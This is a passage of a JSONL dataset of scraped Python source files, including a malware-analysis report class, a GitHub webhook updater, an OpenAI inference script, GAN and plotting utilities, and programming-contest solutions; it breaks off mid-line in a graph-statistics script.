render_factor: int = 35\r\n) -> ModelImageVisualizer:\r\n    learn = gen_inference_wide(root_folder=root_folder, weights_name=weights_name)\r\n    filtr = MasterFilter([ColorizerFilter(learn=learn)], render_factor=render_factor)\r\n    vis = ModelImageVisualizer(filtr, results_dir=results_dir)\r\n    return vis\r\n\r\n\r\ndef get_artistic_image_colorizer(\r\n    root_folder: Path = Path('./'),\r\n    weights_name: str = 'ColorizeArtistic_gen',\r\n    results_dir='result_images',\r\n    render_factor: int = 35\r\n) -> ModelImageVisualizer:\r\n    learn = gen_inference_deep(root_folder=root_folder, weights_name=weights_name)\r\n    filtr = MasterFilter([ColorizerFilter(learn=learn)], render_factor=render_factor)\r\n    vis = ModelImageVisualizer(filtr, results_dir=results_dir)\r\n    return vis\r\n\r\n","repo_name":"enpeizhao/CVprojects","sub_path":"codes/21.GAN老照片上色动起来/DeOldify/deoldify/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"53"}
+{"seq_id":"2316766467","text":"\"\"\" Reporter Class\n\nThis class manages the reporting part.\nManual: for the API or HTML reporting, for example.\nAutomated: for sending mail or to MISP, for example.\n\nModules for the automated part are autoloaded. 
They need to be in the lama.reporter.automated package.\nModules for manual reporting need to be added in the make_report function.\n\n\"\"\"\n\n__author__ = \"Valentin Giannini\"\n__copyright__ = \"Copyright 2016, LAMA\"\n__credits__ = [\"\"]\n__license__ = \"GPL\"\n__version__ = \"3\"\n__maintainer__ = \"Valentin Giannini - CSE Team\"\n__email__ = \"cse.contact -at- post.lu\"\n__status__ = \"Production\"\n\n\nfrom lama.reporter.automated import *\nfrom lama.models.analysis import Analysis\nfrom lama.reporter.json_reporter import JsonReporter\nfrom lama.reporter.html_reporter import HtmlReporter\nfrom lama.reporter.automated_reporter import AutomatedReporter\n\n\nclass Reporter(object):\n    \"\"\"\n    Reporter class\n    \"\"\"\n\n    @staticmethod\n    def make_automated_report(analysis):\n        \"\"\"\n        Called by the dispatcher when an analysis is finished.\n        It calls the run() function on each automated module.\n        \"\"\"\n        for rep in AutomatedReporter:\n            r = rep()\n            r.run(analysis)\n\n    @staticmethod\n    def make_report(analysis_uid, report_type=\"json\"):\n        \"\"\"\n        Static make_report method.\n        Generates the report in the given format (json, html).\n\n        Args :\n            **analysis_uid** : UID of the analysis.\n            **report_type** (string) : Type of output format (json, html)\n        \"\"\"\n        report_type = report_type.lower()\n        analysis = Analysis.find_by_uid(analysis_uid)\n        if analysis:\n            if report_type == \"json\":\n                # make json report\n                return \"<pre>\" + JsonReporter.make_report(analysis) + \"</pre>\"\n            if report_type == \"html\":\n                # make html report\n                return HtmlReporter.make_report(analysis)\n        # type not found\n        return \"Doesn't exist\"\n","repo_name":"post-cyberlabs/lama","sub_path":"lama/reporter/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"25198267032","text":"class Solution:\n    def removeDuplicates(self, nums: List[int]) -> int:\n        uniqueIndex = 1  # index to place next unique value\n        for index in range(1, len(nums)):\n            # iterate through the array \n            # keep placing unique values at above index\n            if nums[index] != nums[index - 1]:\n                nums[uniqueIndex] = nums[index]\n                uniqueIndex += 1\n        return uniqueIndex\n","repo_name":"Reflectrr/leetcode","sub_path":"26.remove_duplicates_from_sorted_array.py","file_name":"26.remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33359476865","text":"import os\nimport sys\n\nfrom PyQt5.QtGui import QIcon\nfrom matplotlib.backends.qt_compat import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTableWidget, QTableWidgetItem, QPushButton, QHeaderView, QHBoxLayout, QVBoxLayout\nimport lda_screen\nimport meta\nimport svm_screen\nfrom fonts import *\nimport pandas as pd\nfrom PyQt5.QtCore import pyqtSignal, QObject\n\nclass AnalyzeApp(QtWidgets.QMainWindow):\n\n    def __init__(self):\n        super().__init__()\n        self.resize(1050, 800)\n        self.centralwidget = QtWidgets.QWidget()\n        self.setCentralWidget(self.centralwidget)\n\n        icon = QIcon(\"icon.ico\")\n        self.setWindowIcon(icon)\n\n        self.loadDataButton = QtWidgets.QPushButton(self.centralwidget)\n        self.loadDataButton.setGeometry(QtCore.QRect(20, 700, 1010, 40))\n        self.loadDataButton.setFont(buttonFont)\n        self.loadDataButton.setAutoDefault(False)\n        self.loadDataButton.clicked.connect(self.loadData)\n\n        self.svmButton = QtWidgets.QPushButton(self.centralwidget)\n        self.svmButton.setGeometry(QtCore.QRect(20, 740, 504, 40))\n        self.svmButton.setFont(buttonFont)\n        self.svmButton.setAutoDefault(False)\n        self.svmButton.clicked.connect(self.onSvmClicked)\n\n        self.ldaButton = QtWidgets.QPushButton(self.centralwidget)\n        self.ldaButton.setGeometry(QtCore.QRect(525, 740, 504, 40))\n        self.ldaButton.setFont(buttonFont)\n        self.ldaButton.setAutoDefault(False)\n        self.ldaButton.clicked.connect(self.onLdaClicked)\n\n        self.table = QtWidgets.QTableWidget()\n        central_widget = QtWidgets.QWidget()\n        layout = QtWidgets.QVBoxLayout(central_widget)\n\n        layout.addWidget(self.table)\n        layout.addWidget(self.loadDataButton)\n        layout.addWidget(self.svmButton)\n        layout.addWidget(self.ldaButton)\n        self.setCentralWidget(central_widget)\n\n        self.retranslateUi()\n        QtCore.QMetaObject.connectSlotsByName(self)\n\n    def loadData(self):\n        path, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Select XLSX File', os.path.dirname(__file__), \"Excel Files (*.xlsx)\")\n\n        if path:\n            file_name = os.path.basename(path)\n            file_path = os.path.dirname(path)\n            self.showData(os.path.join(file_path, file_name))\n    def showData(self, path):\n        print(path)\n\n        self.df = pd.read_excel(path.strip())\n        if self.df.size == 0:\n            return\n\n        self.df.fillna('', inplace=True)\n        self.table.setRowCount(self.df.shape[0])\n        self.table.setColumnCount(self.df.shape[1])\n        self.table.setHorizontalHeaderLabels(self.df.columns)\n\n        # iterrows() yields (index, row values) pairs\n        for row in 
self.df.iterrows():\n            values = row[1]\n            for col_index, value in enumerate(values):\n                if isinstance(value, (float, int)):\n                    value = '{0:0,.4f}'.format(value)\n                tableItem = QTableWidgetItem(str(value))\n                self.table.setItem(row[0], col_index, tableItem)\n\n        self.table.setColumnWidth(2, 300)\n\n    def getDataFrameFromTable(self):\n        data = []\n\n        for row in range(self.table.rowCount()):\n            rowData = []\n            for col in range(self.table.columnCount()):\n                item = self.table.item(row, col)\n                if item is not None:\n                    rowData.append(item.text())\n                else:\n                    rowData.append(\"\")\n            data.append(rowData)\n\n        headers = self.df.columns.tolist()\n        return pd.DataFrame(data, columns=headers)\n\n    def onSvmClicked(self):\n        self.svmScreen = svm_screen.SvmAnalyze(self.getDataFrameFromTable())\n        self.svmScreen.show()\n\n    def onLdaClicked(self):\n        self.ldaScreen = lda_screen.LdaAnalyze(self.getDataFrameFromTable())\n        self.ldaScreen.show()\n\n    def onRemoveButtonClicked(self):\n        pass\n\n    def onAddButtonClicked(self):\n        pass\n\n    def retranslateUi(self):\n        _translate = QtCore.QCoreApplication.translate\n        self.setWindowTitle(_translate(\"AnalyzeWindow\", \"Analyze Screen\"))\n        self.loadDataButton.setText(_translate(\"AnalyzeWindow\", \"Load Data\"))\n        self.svmButton.setText(_translate(\"AnalyzeWindow\", \"SVM\"))\n        self.ldaButton.setText(_translate(\"AnalyzeWindow\", \"LDA\"))\n","repo_name":"amir00462/ElectronicNose","sub_path":"analyze_screen.py","file_name":"analyze_screen.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18207656437","text":"# This python script just converts between different formats of RGB values,\n# like #FFFFFF or (255, 255, 255)\n\ndef hex_str2num(string):\n    string_c = string\n    string = string[1:]\n\n    if len(string) == 6: \n        print(string_c + \"\\t=> \", end='')\n        for i in range(0, 6, 2):\n            temp = string[i]\n            temp += string[i+1]\n\n            num = int(temp, 16)\n\n            print(num, end=' ') \n\n    elif len(string) == 3: \n        print(string_c + \"\\t=> \", end='')\n        for i in range(0, 3):\n            temp = string[i]\n\n            # a shorthand digit expands to two copies of itself: 0xF -> 0xFF = 15 * 17\n            num = int(temp, 16) * 17\n\n            print(num, end=' ')\n\n    else:\n        print(\"please make sure input is right format... 
example: #FAFAFA\")\n\n    print(\"\")\n\n# Input values are assumed to be in the 0-255 range; larger values\n# would produce more than two hex digits per channel\ndef hex_num2str(rgb_values):\n    rgb_str = \"#\"\n    for i in range(0, 3):\n        buffer = int(rgb_values[i])\n        buffer = hex(buffer)\n        buffer = buffer[2:]\n        buffer = buffer.zfill(2).upper()\n\n        rgb_str += buffer\n\n    print(\"%s, %s, %s => %s\" % (rgb_values[0], \n                                rgb_values[1],\n                                rgb_values[2],\n                                rgb_str))\n\nhex_str2num(\"#0FFFFF\")\nrgb_values = ['15', '255', '255']\nhex_num2str(rgb_values)\n","repo_name":"LeonardoLoureiro/Mini_Projects","sub_path":"Programs/Hex_Converter.py","file_name":"Hex_Converter.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70185396969","text":"import hmac\nimport asyncio\n\nimport yaml\n\nfrom aiohttp import web\n\nfrom cli import args\nfrom rpc import (\n    init_rpc, stop_rpc, RPC_COMMAND_RESTART_UPDATER, RPC_COMMAND_RESTART_API,\n    RPC_COMMAND_PULL_UPDATER, RPC_COMMAND_PULL_API\n    )\nfrom migrate import migrate\nfrom utils import pull, clean_exit\n\n\nasync def on_startup(app: web.Application) -> None:\n    await migrate(app)\n    await init_rpc(app)\n\n\nasync def on_cleanup(app: web.Application) -> None:\n    await stop_rpc(app)\n\n\nasync def verify_github_request(req: web.Request) -> None:\n    header_signature = req.headers.get(\"X-Hub-Signature\")\n    if not header_signature:\n        raise web.HTTPUnauthorized(reason=\"Missing signature header\")\n\n    secret = req.app[\"config\"][\"github-webhook-token\"]\n\n    sha_name, delim, signature = header_signature.partition(\"=\")\n    # all three parts must be present for a well-formed \"sha1=<hex>\" header\n    if not (sha_name and delim and signature):\n        raise web.HTTPUnauthorized(reason=\"Bad signature header\")\n\n    mac = hmac.new(secret.encode(), msg=await req.read(), digestmod=\"sha1\")\n\n    if not hmac.compare_digest(mac.hexdigest(), signature):\n        raise web.HTTPUnauthorized(reason=\"Hashes did not match\")\n\n\nasync def update_updaters() -> None:\n    await app[\"rpc_client\"].call(RPC_COMMAND_PULL_UPDATER, timeout=15)\n\n    # TODO: only restart nodes with a successful pull\n\n    await 
app[\"rpc_client\"].call(\n RPC_COMMAND_RESTART_UPDATER, {\"node\": app[\"rpc_server\"].node}\n )\n\n # update self\n clean_exit()\n\n\nasync def update_apis() -> None:\n await app[\"rpc_client\"].call(RPC_COMMAND_PULL_API, timeout=15)\n\n # TODO: only restart nodes with successfull pull\n\n await app[\"api_rpc_client\"].call(RPC_COMMAND_RESTART_API)\n\n\nasync def updater_wh(req: web.Request) -> web.Response:\n await verify_github_request(req)\n\n print(\"UPDATER webhook fired\")\n\n asyncio.create_task(update_updaters())\n\n return web.Response()\n\n\nasync def api_wh(req: web.Request) -> web.Response:\n await verify_github_request(req)\n\n print(\"API webhook fired\")\n\n asyncio.create_task(update_apis())\n\n return web.Response()\n\n\nif __name__ == \"__main__\":\n pull(\"/code\")\n\n app = web.Application()\n\n with open(args.config_file, \"r\") as f:\n app[\"config\"] = yaml.load(f, Loader=yaml.SafeLoader)\n\n app[\"args\"] = args\n\n app.on_startup.append(on_startup)\n app.on_cleanup.append(on_cleanup)\n\n app.add_routes([web.post(\"/wh/github/updater\", updater_wh)])\n app.add_routes([web.post(\"/wh/github/api\", api_wh)])\n\n web.run_app(app, host=app[\"args\"].host, port=app[\"args\"].port)\n","repo_name":"IOMirea/messenger-updater","sub_path":"updater/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37928778006","text":"import gzip\nimport os\nimport sys\nimport pickle\nimport json\nimport time\nimport glob\nimport random\nimport shutil\nimport pathlib\nimport logging\nimport datetime\nimport argparse\nimport pandas as pd\nimport openai\nfrom distutils.util import strtobool\n\n\n\nMODEL_MAPPING = {\n 'instructgpt': 'text-davinci-003',\n 'gpt3': 'text-davinci-002',\n 'text-davinci-003': 'text-davinci-003',\n 'text-davinci-002': 'text-davinci-002',\n 'code-davinci-002': 'code-davinci-002',\n 'chatGPT' : 'gpt-3.5-turbo'\n}\n\n# Configs\nlogger = logging.getLogger('logger')\n\ndef load_parser_and_args():\n parser = argparse.ArgumentParser()\n ### directory ###\n parser.add_argument('--base_dir', type=str, default='/home/intern/sblee/sblee/Samsung')\n parser.add_argument('--task_dir', type=str, default='/home/intern/sblee/sblee/Samsung/rationale/data/preprocessed_te_apoe_q21.pickle')\n parser.add_argument('--prompt', type=str, default='prompt6')\n\n ### model parameters ###\n parser.add_argument('--model_type', type=str, default='chatGPT')\n parser.add_argument('--max_tokens', type=int, default=2048)\n parser.add_argument('--temperature', type=float, default=0)\n parser.add_argument('--top_p', type=float, default=1.0)\n parser.add_argument('--frequency_penalty', type=float, default=1.0)\n parser.add_argument('--presence_penalty', type=float, default=0.0)\n parser.add_argument('--num_samples', type=int, default=0)\n\n args = parser.parse_args()\n \n args.output_dir = os.path.join(args.base_dir, 'results')\n args.model_name_or_path = MODEL_MAPPING[args.model_type]\n return parser, args\n\n\n\ndef init_logger(args):\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n handler = logging.FileHandler(os.path.join(args.output_dir, '{}_{:%Y-%m-%d-%H:%M:%S}.log'.format(args.prompt, datetime.datetime.now())), encoding='utf=8')\n logger.addHandler(handler)\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO\n )\n logger.warning(args)\n\n\n\ndef 
corr_ans(inp: str):\n    inp = inp.lower().replace('\\n','')\n    output = list(inp.split())\n    output_len = len(output)\n    frt_output = \" \".join(output[:])\n    answer = 0\n    \n    if 'normal cognition' in frt_output : answer = 'CN'\n    elif 'mild cognitive impairment' in frt_output : answer = 'MCI'\n    elif 'dementia' in frt_output : answer = 'Dementia'\n    else : \n        if output_len < 7 :\n            if 'normal' in inp : answer = 'CN'\n            elif 'mild' in inp : answer = 'MCI'\n            elif 'dementia' in inp : answer = 'Dementia'\n        else : \n            if 'normal' in frt_output : answer = 'CN'\n            elif 'mild' in frt_output : answer = 'MCI'\n            elif 'dementia' in frt_output : answer = 'Dementia'\n    \n    return answer\n\n\n\ndef Accuracy(prediction):\n\n    filenames = [k for k, v in prediction.items()]\n    groundtruths = [v['groundtruth'] for k, v in prediction.items()]\n    predictions = [corr_ans(v['prediction']) for k, v in prediction.items()]\n\n    df = pd.DataFrame(zip(filenames, groundtruths, predictions), columns=['file name', 'groundtruth', 'prediction'])\n    df['accurate'] = df['prediction'] == df['groundtruth']\n\n    return df['accurate'].sum()/len(df)\n\n\n\nclass GPT(object):\n    def __init__(self, args):\n        self.model_name = args.model_name_or_path\n        self.max_tokens = args.max_tokens\n        self.temperature = args.temperature\n        self.top_p = args.top_p\n        self.frequency_penalty = args.frequency_penalty\n        self.presence_penalty = args.presence_penalty\n        self.cur_idx = -1\n        self.cur_req = 0\n\n    def login_to_openai(self, keys, cur_idx):\n        openai.api_key = keys[cur_idx] \n\n    def set_new_key(self):\n        with open('keys.json') as f:\n            keys = json.load(f)\n        self.cur_idx += 1\n        self.cur_idx = self.cur_idx % len(keys)\n        self.login_to_openai(keys, self.cur_idx)\n\n    def inference(self, prompt, return_raw=False):\n        timeout_stack = 0\n        while True:\n            if self.cur_req >= 15:\n                time.sleep(60)\n                self.cur_req = 0\n            try:\n                if self.model_name == 'gpt-3.5-turbo': # chatGPT\n                    output = openai.ChatCompletion.create( \n                        model = self.model_name,\n                        messages=[\n                            {\"role\":\"system\", \"content\": prompt},\n                        ]\n                    )\n                    break\n                else :\n                    output = openai.Completion.create( \n                        engine=self.model_name,\n                        prompt=prompt,\n                        n=1, # How many completions to generate for each prompt.\n                        max_tokens=self.max_tokens,\n                        temperature=self.temperature,\n                        frequency_penalty=self.frequency_penalty,\n                        presence_penalty=self.presence_penalty,\n                        logprobs=1\n                    )\n                    break\n\n            except Exception as e:\n                timeout_stack += 1\n                if timeout_stack >= 3:\n                    logger.info(\"Change to another key\")\n                    self.set_new_key()\n                    timeout_stack = 0\n                time.sleep(60)\n        self.cur_req += 1  # count this request toward the per-key rate limit\n        if return_raw:\n            return output\n\n        if self.model_name == 'gpt-3.5-turbo' :\n            return output['choices'][0]['message']['content'] # chatGPT\n        else : \n            return output['choices'][0]['text'] \n\n\n\ndef main(args):\n    if not os.path.exists(args.output_dir):\n        os.makedirs(args.output_dir)\n    \n    # setup logging\n    init_logger(args)\n\n    # load model\n    prediction = dict()\n    model = GPT(args)\n    model.set_new_key()\n\n    # load data\n    with gzip.open(args.task_dir, 'r') as f:\n        fr = pickle.load(f)\n    \n\n    for t in fr:\n        idx = t['file name']\n        input_dict = {}\n        name_list = ['label', 'age', 'sex', 'educ', 'marriage', 'apoe', 'mmse', 'fmri']\n        for name in name_list:\n            input_dict[name] = t[name]\n        for id in range(22):\n            input_dict['q{}'.format(id)] = t['q{}'.format(id)]\n\n        # prompt making\n        with open(os.path.join(args.base_dir, 'prompt', '{}.json'.format(args.prompt)), 'r') as f:\n            prompt = f.read()\n        model_input = prompt.format(**input_dict)\n\n        logger.info(\"***** Model Input *****\")\n        
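# log the fully rendered prompt that is about to be sent to the model\n        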
logger.info(model_input)\n\n        # inference\n        pred = model.inference(model_input)\n        logger.info(\"***** Model Output *****\")\n        logger.info({input_dict['label'] : pred})\n\n        # saving\n        prediction[idx] = {'groundtruth' : input_dict['label'] , 'prediction' : pred}\n    \n    # accuracy\n    accr = Accuracy(prediction)\n    logger.info(\"accuracy: {}\".format(accr))\n\n    result = {'accuracy' : accr, 'predictions' : prediction }\n\n    with open(os.path.join(args.output_dir, '{}_{:%Y-%m-%d-%H:%M:%S}_predicted_results.json'.format(args.prompt, datetime.datetime.now())), 'w', encoding='utf-8') as f:\n        json.dump(result, f, indent=2)\n\n    return accr\n\nif __name__ == \"__main__\":\n    parser, args = load_parser_and_args()\n    main(args)","repo_name":"seunbite/Medical","sub_path":"gpt_infer.py","file_name":"gpt_infer.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4238217325","text":"import os\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.utils import array_to_img\n\n\ndef get_dirs(save_dir):\n    checkpoint_dir = os.path.join(save_dir, \"model_ckpts/ckpts\")\n    log_dir = os.path.join(save_dir, \"tf_logs\")\n    save_path = os.path.join(save_dir, \"training_progress\")\n\n    os.makedirs(checkpoint_dir, exist_ok=True)\n    os.makedirs(log_dir, exist_ok=True)\n    os.makedirs(save_path, exist_ok=True)\n\n    return checkpoint_dir, log_dir, save_path\n\n\ndef generate_images(model, test_input, target, save_path, step):\n    prediction = model(test_input)\n\n    if step % 500 == 0:\n        plt.figure(figsize=(9, 3))\n\n        display_list = [test_input[0], target[0], prediction[0]]\n        title = ['Input Image', 'Ground Truth', 'Predicted Image']\n\n        for i in range(3):\n            plt.subplot(1, 3, i + 1)\n            plt.title(title[i])\n            plt.imshow(display_list[i] * 0.5 + 0.5)\n            plt.axis('off')\n        plt.tight_layout()\n        plt.show()\n\n    try:\n        img = array_to_img(prediction[0] * 0.5 + 0.5)\n        img.save(f'{save_path}/{step//100}.png')\n    except Exception as e:\n        print(e)\n        pass\n","repo_name":"kmnis/comicface.ai","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"31622702508","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nfrom collections import deque\n\nw,h = map(int,input().split())\nn = int(input())\ntapes = [list(map(int,input().split())) for _ in range(n)]\n\n# first, coordinate compression O(NlogN)\nset_x = {0,w}\nset_y = {0,h}\nfor tape in tapes:\n    set_x.add(tape[0])\n    set_x.add(tape[2])\n    set_y.add(tape[1])\n    set_y.add(tape[3])\n\nlist_x = sorted(list(set_x))\nlist_y = sorted(list(set_y))\n\ndic_x = {}\ndic_y = {}\nfor list_, dic_ in zip([list_x, list_y], [dic_x, dic_y]):\n    for i,val in enumerate(list_):\n        dic_[val] = i\n\nfor i in range(n):\n    x1,y1,x2,y2 = tapes[i]\n    tapes[i][0] = dic_x[x1]\n    tapes[i][1] = dic_y[y1]\n    tapes[i][2] = dic_x[x2]\n    tapes[i][3] = dic_y[y2]\n\n# find the regions not covered by tape with the imos (2D prefix sum) method O(N^2)\nw = len(list_x)-1\nh = len(list_y)-1\n\nimos = [[0] * (w+1) for _ in range(h+1)]\n\nfor tape in tapes:\n    x1,y1,x2,y2 = tape\n    imos[y1][x1] += 1\n    imos[y1][x2] += -1\n    imos[y2][x1] += -1\n    imos[y2][x2] += 1\n\nfor i in range(h+1):\n    for j in range(1,w+1):\n        imos[i][j] += imos[i][j-1]\n\nfor i in range(1,h+1):\n    for j in range(w+1):\n        imos[i][j] += 
for i in range(1,h+1):\n    for j in range(w+1):\n        imos[i][j] += imos[i-1][j]\n\n# Flood-fill over all uncovered cells; encode a cell's coordinates as y*10000+x. O(N^2)\nwhites = set()\nfor i in range(h):\n    for j in range(w):\n        if(imos[i][j] == 0):\n            whites.add(i*10000+j)\n\nd = deque()\nans = 0\nwhile(whites):\n    ans += 1\n    start = whites.pop()\n    d.append(start)\n    while(d):\n        now = d.pop()\n        for pl in [1,-1,10000,-10000]:\n            next = now + pl\n            if( next in whites):\n                d.append(next)\n                whites.remove(next)\n\nprint(ans)\n\n# Implementation took 25 minutes, debugging another 30.\n# I had mixed up the tapes' top-right coordinates with the coordinates imos should operate on:\n# -> around lines 49-52 I had wrongly turned x2,y2 into x2+1,y2+1.\n\n\n# for i in imos:\n#     print(i)\n","repo_name":"komajun365/competitive_programming","sub_path":"JOI/joi2008ho/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73142346408","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef scatter_plot(features, labels, details):\n    \"\"\"\n    Do a scatter plot of points with boolean labels.\n\n    :param features: a list of (x, y) points\n    :param labels: a list of labels for each point\n    :param details: a map of label to color and legend context\n    \"\"\"\n    (x, y), = np.dstack(features)\n    labels = np.array(labels)\n    for i, ctx in details.items():\n        s = np.where(labels == i)\n        plt.scatter(x[s], y[s], **ctx)\n\n\ndef decision_boundry_plot(clf):\n    \"\"\"\n    We make a \"grid\" of every point in the graph and make a prediction and plot\n    the results\n    \"\"\"\n    steps = np.arange(0.0, 1.1, 0.01)\n    x, y = np.meshgrid(steps, steps)\n    map_features = np.c_[x.ravel(), y.ravel()]\n    graph_labels = clf.predict(map_features)\n    c = graph_labels.reshape(x.shape)\n    plt.pcolormesh(x, y, c, cmap=plt.get_cmap('seismic'))\n\n\ndef prettyPicture(clf, features_test, labels_test):\n    plt.close()\n    decision_boundry_plot(clf)\n    scatter_plot(features_test, labels_test, {\n        0: {'c': 'b', 'label': 'test_fast'},\n        1: {'c': 'r', 'label': 'test_slow'},\n    })\n\n    plt.xlim(0.0, 1.0)\n    plt.ylim(0.0, 1.0)\n    plt.xlabel(\"bumpiness\")\n    plt.ylabel(\"grade\")\n    plt.legend()\n    plt.show()\n","repo_name":"clayg/udacity","sub_path":"ud120/5.08/tools/class_vis.py","file_name":"class_vis.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35113738735","text":"import os\nimport math\nimport random\nrandom.seed(10)\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch\nimport networkx as nx\ntorch.manual_seed(120)\nfrom torch.utils.data import random_split, Dataset\nfrom torch_geometric.data import Data\nfrom torch_geometric.utils import subgraph, to_undirected\nfrom torch_geometric.datasets import EmailEUCore\n# from datasets.abstract_dataset import AbstractDataModule, AbstractDatasetInfos\nimport torch.nn.functional as F\nfrom sklearn import metrics\nfrom torch_geometric.utils.convert import from_networkx\nfrom itertools import combinations\n\nfrom torch_geometric.datasets import Planetoid,SNAPDataset, StochasticBlockModelDataset, AttributedGraphDataset\nimport torch_geometric.transforms as T\nfrom torch_geometric.nn import GCNConv\nfrom torch_geometric.utils import train_test_split_edges\nfrom graph_statistics import compute_graph_statistics\nfrom graph_statistics import power_law_alpha,gini\nimport pandas as pd\n# import seaborn as sns\nimport pickle\n\n\n\ndef mmd_rbf(X, Y, gamma=1.0):\n    \"\"\"MMD using rbf (gaussian) kernel (i.e., k(x,y) = exp(-gamma * ||x-y||^2 / 2))\n    Arguments:\n        X {[n_sample1, dim]} -- [X matrix]\n        
Y {[n_sample2, dim]} -- [Y matrix]\n Keyword Arguments:\n gamma {float} -- [kernel parameter] (default: {1.0})\n Returns:\n [scalar] -- [MMD value]\n \"\"\"\n XX = metrics.pairwise.rbf_kernel(X, X, gamma)\n YY = metrics.pairwise.rbf_kernel(Y, Y, gamma)\n XY = metrics.pairwise.rbf_kernel(X, Y, gamma)\n return XX.mean() + YY.mean() - 2 * XY.mean()\n\n\ndef squares(G, nodes=None):\n r\"\"\"Borrowed from networkx square clustering, this could be made much more efficient.\n \"\"\"\n if nodes is None:\n node_iter = G\n else:\n node_iter = G.nbunch_iter(nodes)\n squares = 0\n for v in node_iter:\n for u, w in combinations(G[v], 2):\n squares += len((set(G[u]) & set(G[w])) - {v})\n return squares/4\n\ndegrees = []\npower_stats = []\nedge_syn_lists = []\nassortativity = []\ncluster = []\ngini_coef = []\nfor i in range(1,11,1):\n with open('outputs/email-eucore_stop_thresh_syngr_30ktrain_rw_200e_grsize40_batch32_right_progressive_percentage/15-51-32/' +str(i)+'_edge_list.pkl','rb') as f:\n # edge_list_syn = []\n # for edge in f.readlines():\n # e = edge.decode().strip('\\n').split(',')\n #\n edge_list_syn = pickle.load(f)\n edge_syn_lists.append(edge_list_syn)\n\n syn_graph = nx.from_edgelist(edge_list_syn, create_using=nx.Graph())\n deg =sorted((d for n, d in syn_graph.degree()), reverse=True)\n\n degrees.append(np.unique(deg, return_counts=True))\n\n # graphs.data.edge_index = to_undirected(graphs.data.edge_index)\n # edge_list_tensor = to_undirected(graphs.data.edge_index)\n # edge_list_tensor = edge_list_tensor.transpose(0, 1)\n # edge_list = [(int(i[0]), int(i[1])) for i in edge_list_tensor]\n # real_graph = nx.from_edgelist(edge_list)\n gini_coef.append(gini(nx.to_scipy_sparse_array(syn_graph)))\n power_stats.append(power_law_alpha(nx.to_scipy_sparse_array(syn_graph)))#sum(nx.triangles(syn_graph.to_undirected()).values()) / 3)\n assortativity.append(nx.degree_assortativity_coefficient(syn_graph))\n cluster.append(nx.average_clustering(syn_graph))\n\nprint(degrees[0])\n\nwith open('outputs/Synthetic_benchmark/DSBM_edge_list_sbm.pkl','rb') as f:\n edge_list_syn = pickle.load(f)\n# plot lines\n# plt.plot(list(range(10)), triangle_stats, label = \"Unif 100 epochs\", color ='blue',linestyle = 'dashed')\n\n# df = pd.DataFrame({'assort.': assortativity,\n# 'real assort.':[-0.01099 for i in range(10)],\n# 'syn pow law':power_stats,\n# 'real pow law': [1.3613 for i in range(10)],\n# 'syn. clust. coef.':cluster,\n# 'real. clust. 
coef.':[0.39935 for i in range(10)],\n# 'gini coef.':gini_coef,\n# 'real gini coef.':[0.57105 for i in range(10)]})\n#\n#\n#\n#\n# sns.set_style(\"darkgrid\")\n#\n#\n# fig,axs = plt.subplots(2,2)\n\n# a=sns.histplot(degrees[0],ax=axs[0])\n\n# g = sns.FacetGrid(data=df)#, palette=['red', 'red', 'blue', 'blue', 'purple', 'purple','green','green'])#,markers=True)\n# g.map(plt.plot)\n\n\n\n\n# g.set_xticks(range(len(df)))\n# g.set_xticklabels([10*i for i in range(1,11,1)])\n#\n#\n# axs[0,0].plot([10*i for i in range(1,11,1)], assortativity, label = \"syn assort.\", color ='blue', linestyle = 'dashed', marker = '*')\n# axs[0,0].plot([10*i for i in range(1,11,1)], [-0.01099 for i in range(10)], label = \"real assort.\", color ='blue')\n# axs[0,0].set_xlabel(\"Percentage of |E|\")\n# axs[0,0].set_ylabel('Assortativity')\n# # axs[0,0].legend()\n#\n#\n# axs[0,1].plot([10*i for i in range(1,11,1)], power_stats, label = \"syn assort.\", color ='purple', linestyle = 'dashed',marker = '*')\n# axs[0,1].plot([10*i for i in range(1,11,1)], [1.3613 for i in range(10)], label = \"real assort.\", color ='purple')\n# axs[0,1].set_xlabel(\"Percentage of |E|\")\n# axs[0,1].set_ylabel('Pow law alpha')\n# # axs[0,1].legend()\n#\n# axs[1,0].plot([10*i for i in range(1,11,1)], cluster, label = \"clust. coef.\", color = 'orange',linestyle = 'dashed',marker = '*')\n# axs[1,0].plot([10*i for i in range(1,11,1)], [0.39935 for i in range(10)], label = \"real 